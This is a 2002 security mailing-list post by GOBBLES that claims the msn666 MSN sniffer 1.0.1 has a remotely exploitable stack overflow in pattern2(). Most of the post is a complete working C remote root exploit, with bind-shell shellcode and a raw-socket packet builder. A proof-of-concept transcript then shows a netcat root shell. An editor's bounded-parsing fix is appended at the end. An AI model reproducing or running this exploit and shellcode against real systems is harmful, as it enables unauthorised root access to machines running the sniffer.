UPDATE UPDATE UPDATE UPDATE UPDATE UPDATE

From: gobblesat_private
Date: Fri Jun 14 2002 - 08:25:19 PDT


    
     ++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++
    ++++STILL BACKDOOR IN MSN666 MSN SNIFFER FOR SNIFFING MSN+++++
     ++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++
    
    
    +EMERGENCY+++
    
    After disclosing malicious backdoor root hole in msn666 sniffer
    for sniffing msn yesterday, GOBBLES notice following in he inbox:
    
    ...
    
    <QUOTE>
    
    What about the version posted today?
    
    http://underground.or.kr/project/msn666/msn666-1.0.1.tar.gz
    
    Thanks!
    
    - ---
    Dustin Miller, President
    SharePoint Experts, a division of FuseWerx LTD
    http://www.sharepointexperts.com/
    http://www.fusewerx.com/
    
    </QUOTE>
    
    
    Thank you Mr. President! GOBBLES get right on it hehehe ;PPppPP
    
    Then we also see this:
    
    Return-Path: <cyrusat_private>
    X-Sieve: cmu-sieve 2.0
    Return-Path: <s1980914at_private>
    Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.34])
            by imap3.hushmail.com (Postfix) with ESMTP id E780E28184E
            for <gobbles_40hushmail_2ecomat_private>; Fri, 14 Jun 2002 08:08:17 -0700 (PDT)
    Received: from inhavision.inha.ac.kr (inhavision.inha.ac.kr [165.246.10.162])
            by smtp4.hushmail.com (Postfix) with ESMTP
            id B7A2B3F11; Fri, 14 Jun 2002 08:08:04 -0700 (PDT)
    Received: from SEONUS (inhavision.inha.ac.kr [165.246.10.162])
            by inhavision.inha.ac.kr (8.11.1/8.11.1) with SMTP id g5EFFJ509086;
            Sat, 15 Jun 2002 00:15:22 +0900 (KST)
    Message-ID: <001801c213b4$b3563e90$6401a8c0@SEONUS>
    From: "Seunghyun Seo" <s1980914at_private>
    To: <gobblesat_private>, <camisat_private>
    Cc: <bugtraqat_private>, <vuln-devat_private>,
            <bugsat_private>, <vulnwatchat_private>,
            <submissionsat_private>, <GOBBLESat_private>
    References: <200206132342.g5DNgvc54973at_private>
    Subject: Re: +ALERT+ BACKDOOR IN MSN666 SNIFFER FOR SNIFFING MSN +ALERT+
    Date: Sat, 15 Jun 2002 00:03:46 +0900
    Organization: khdp.org, underground.or.kr
    MIME-Version: 1.0
    Content-Type: text/plain;
            charset="euc-kr"
    Content-Transfer-Encoding: base64
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Mailer: Microsoft Outlook Express 6.00.2462.0000
    X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
    
    
    I'm writer of msn666 msn message sniffer,
    there are no problems, and no backdoors in it,
    if you read the code and procedure of it detail then you could notice it rightly.
    
    Check msn666-1.0.0.tar.gz  and msn666-1.0.1.tar.gz
    at http://underground.or.kr/project/msn666/  again.
    My previous attached file needs revision.
    
    ...
    
    And still see bugs? in code... HRM!?!?!
    
    
    +ALERT+++
    
    Backdoor still present in updated version of msn666 sniffer for
    sniffing msn.
    
    +DETAILS+++
    
    GOBBLES-scan-incoming detect following in incoming backdoor package
    of updated msn666 sniffer for sniffing msn version 1.0.1:
    
    msn666.c:
    
    ...
    
    void
    pattern2 ( char *msg, int size )
    {
            char opmsg[16];
    
    ...
    
            sscanf ( msg, "%s", &opmsg );
    
    ...
    
    It still called like this from runpkt():
    
    ...
    
            if ( (int)htons(tcp->dest) == 1863 || ok_flg ) {
    
    ...
    
            if ( tcp->psh ) {
                    memcpy ( buf, data, sizeof(buf) );
                    pattern2( buf, htons(ip->tot_len)-40 );
    ...
    
    GOBBLES think it quite obvious this is still malicious root backdoor
    in msn666 sniffer for sniffing msn.
    
    +EXPLOIT CODE+++
    
    Now that GOBBLES save he friends of team bugtraq from malicious backdoor
    root hole in msn666 sniffer for sniffing msn version 1.0.0 and msn666
    sniffer for sniffing msn version 1.0.1 it is time to release he exploit
    code:
    
    /*
     * disclaimer:
     *
     * GOBBLES SECURITY LABS (GSL) members working
     * on version with -m capabilities. Utilizing libnet.
     *
     * GOBBLES <3 ROUTE
     *
     * This version proves point that even two year
     * old can write remote exploit. Somehow, this
     * horribly written code by Alicia's 2 year old
     * adopted korean nephew works. Remember if you
     * flame this code, you're mocking a 2 year old
     * with more skill than you.
     *
     * There is nothing special about having the ability
     * to write remote root xploits.
     *
     */
    /*
     * GOBBLES-own-msn666.c (Quack Sang edition)
     *
     */
    
    // #include <libnet.h>
    
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <sys/stat.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/tcp.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <errno.h>
    
    #define DADA 0x90
    
    char nappytime[256], treattreat[] =
            // GOBBLES use Taeho shellcode because he speak turkey, hehehe
            // Hello friend Taeho Oh! Come pick up shirt at Defcon@!@!
            "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
            "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
            "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
            "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
            "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
            "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
            "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
            "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
            "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
            "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
            "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
            "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";
    
    
    int
    main(int argc, char **argv)
    {
            struct sockaddr_in playtime;
            struct hostent *poopoo;
            struct iphdr *peepee;
            struct tcphdr *noodlemmm;
            int phewwy, banana, yes = 1;
            char *diaper, *googoo, *store;
    
            if(argc != 4) {
                    fprintf(stdout, "%s <shellcode_address> <source_ip> <dest_host>\n", argv[0]);
                    exit(1);
            }
    
            sscanf(argv[1], "%p", &store);
    
            banana = (sizeof(struct iphdr) + sizeof(struct tcphdr) + strlen(treattreat) + sizeof(nappytime) + 24 + 1);
            diaper = malloc(banana);
            googoo = (char *) (diaper + sizeof(struct iphdr) + sizeof(struct tcphdr));
    
            peepee = (struct iphdr *) diaper;
            noodlemmm = (struct tcphdr *) (diaper + sizeof(struct iphdr));
    
            memset(diaper, '\0', banana);
            memset(googoo, 'x', 16);
            *(long *)&googoo[16] = (long)store;
            *(long *)&googoo[20] = (long)store;
            memset(nappytime, DADA, sizeof(nappytime));
            memcpy(googoo+24, nappytime, strlen(nappytime));
            memcpy(googoo+24+strlen(nappytime), treattreat, strlen(treattreat));
    
            if((poopoo = gethostbyname(argv[3])) == NULL) {
                    perror(";PPppPPpPp");
                    exit(1);
            }
    
            if((phewwy = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
                    perror(";PPpPPpPP");
                    exit(1);
            }
    
            if (setsockopt(phewwy, IPPROTO_IP, IP_HDRINCL, (char *)&yes, sizeof(yes)) == -1) {
                    perror(";PPppPPPp");
                    exit(1);
            }
    
            /* hihihihihi */
            peepee->version = 4;
            peepee->ihl = 5;
            peepee->tot_len = htons(banana);
            peepee->id = htons(getpid());
            peepee->frag_off = 0;
            peepee->ttl = 255;
            peepee->protocol = IPPROTO_TCP;
            peepee->check = 0;
            peepee->saddr = inet_addr(argv[2]);
            /* giggle */
            peepee->daddr = inet_addr(inet_ntoa(*((struct in_addr *)poopoo->h_addr)));
            /* dewty diapey?!? */
            noodlemmm->source = htons(9999);
            noodlemmm->dest = htons(1863);
            noodlemmm->seq = random();
            noodlemmm->doff = 5;
            noodlemmm->syn = 0;
            noodlemmm->window = htons(8888);
            noodlemmm->psh = 1;
    
            playtime.sin_family = AF_INET;
            playtime.sin_port = noodlemmm->dest;
            playtime.sin_addr = *((struct in_addr *)poopoo->h_addr);
            memset(&(playtime.sin_zero), '\0', 8);
    
    
            if((sendto(phewwy, diaper, banana, 0, (struct sockaddr *)&playtime, sizeof(struct sockaddr))) == -1) {
                    perror(";PPpPPPppPP");
                    exit(1);
            }
            else {
                    fprintf(stdout, "!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#\n");
                    exit(0);
            }
    }
    
    
    
    +PROOF OF CONCEPT+++
    
    GOBBLES run msn666 sniffer for sniffing msn version 1.0.1 on he Local
    Area Network (LAN) once again to prove point:
    
    # ./msn666
    
    
    Then GOBBLES run he Quack Sang version of GOBBLES-own-msn666.c:
    
    # ./GOBBLES-own-msn666 0xbfffd6d0 192.168.0.1 192.168.0.2
    !@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#
    # nc 192.168.0.2 30464
    id
    uid=0(root) gid=0(root) groups=0(root)
    
    
    
    +GREETZ+++
    Dave Ahmed for sorting out the mess for us.  Look for us at
    defcon, we've got a special tshirt just for you!
    
    All our friends who have already emailed us with their thanks
    for saving them from this sneaky backdoor.  Hopefully, now that
    the Quack Sang exploit is now private, it'll encourage people
    to stop running the software and to those naughty people who
    think sniffing is an ethical action (mailsnarf anyone?), will
    get what they deserve.
    
    GOBBLES Security
    http://www.bugtraq.org
    http://www.immunitysec.com/GOBBLES/ <- first official mirror,
                                           thanks so much Dave!
    
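Editor's added example, not part of GOBBLES's post or of msn666 itself: the bug shown above is the unbounded `sscanf(msg, "%s", &opmsg)` in pattern2(), which copies a whitespace-delimited token from raw packet data into a 16-byte stack buffer while ignoring the `size` the caller passes. The bounded replacement below keeps the same 16-byte buffer, honours `size`, always NUL-terminates, and reports when a token would not have fit, so a sniffer running as root can drop and log such packets instead of overflowing. Function names and sample payloads are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define OPMSG_LEN 16   /* same buffer size as opmsg[16] in msn666's pattern2() */

/* Bounded replacement for sscanf(msg, "%s", &opmsg).
 * msg is raw packet payload (may not be NUL-terminated); size is the byte
 * count the caller already knows. Copies the first whitespace-delimited
 * token into out, writing at most out_len-1 bytes, and always terminates.
 * Returns the full token length seen on the wire, so a caller can detect
 * (return value >= out_len) input that would have overflowed the original
 * fixed buffer and log it as a malformed or hostile packet. */
size_t read_token(const char *msg, size_t size, char *out, size_t out_len)
{
    size_t i = 0, n = 0;
    /* sscanf("%s") skips leading whitespace; mirror that */
    while (i < size && isspace((unsigned char)msg[i]))
        i++;
    for (; i < size && msg[i] != '\0' && !isspace((unsigned char)msg[i]); i++, n++) {
        if (n + 1 < out_len)        /* keep room for the terminator */
            out[n] = msg[i];
    }
    if (out_len > 0)
        out[n < out_len ? n : out_len - 1] = '\0';
    return n;
}

/* 1 when the first token of the payload would not fit opmsg[OPMSG_LEN] */
int token_overflows(const char *msg, size_t size)
{
    char opmsg[OPMSG_LEN];
    return read_token(msg, size, opmsg, sizeof opmsg) >= sizeof opmsg;
}

int main(void)
{
    /* constructed sample payloads, not captured MSN traffic */
    char ok[] = "MSG 42 N 100\r\n";
    char bad[300];
    char opmsg[OPMSG_LEN];
    size_t n;
    memset(bad, 'A', sizeof bad);   /* oversized first token */
    n = read_token(ok, sizeof ok - 1, opmsg, sizeof opmsg);
    printf("token=%s len=%zu overflow=%d\n", opmsg, n,
           token_overflows(ok, sizeof ok - 1));
    printf("oversized payload: overflow=%d\n", token_overflows(bad, sizeof bad));
    return 0;
}
```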
    


